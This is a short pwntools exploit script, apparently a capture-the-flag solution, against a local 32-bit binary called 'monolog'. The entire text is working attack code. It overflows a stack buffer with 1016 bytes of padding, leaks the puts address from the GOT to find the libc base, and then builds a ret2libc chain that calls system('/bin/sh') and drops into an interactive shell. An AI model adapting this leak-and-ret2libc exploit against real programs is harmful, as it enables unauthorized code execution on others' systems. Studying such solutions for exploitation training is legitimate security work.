from pwn import *


context.binary = binary = ELF("./monolog")

system_libc = binary.libc.sym["system"]
binsh_libc = next(binary.libc.search(b"/bin/sh"))
puts_libc = binary.libc.sym["puts"]
puts_plt = binary.plt["puts"]
puts_got = binary.got["puts"]
main = binary.sym["main"]

payload = b''.join([
		b"A"*1016,
		p32(puts_plt),
		p32(main),
		p32(puts_got),
	])

p = process()
p.sendline(b"-1")
p.sendline(payload)
p.sendline(b"stop")
p.readuntil(b"monolog : ")
p.readuntil(b"\n\n")

leaked = u32(p.readline().strip()[:4])
libc_addr = leaked - puts_libc

system = libc_addr + system_libc
binsh = libc_addr + binsh_libc

payload = b''.join([
		b"A"*1016,
		p32(system),
		p32(main),
		p32(binsh)
	])

p.sendline(b"-1")
p.sendline(payload)
p.sendline(b"stop")
p.readrepeat(.5)
p.interactive()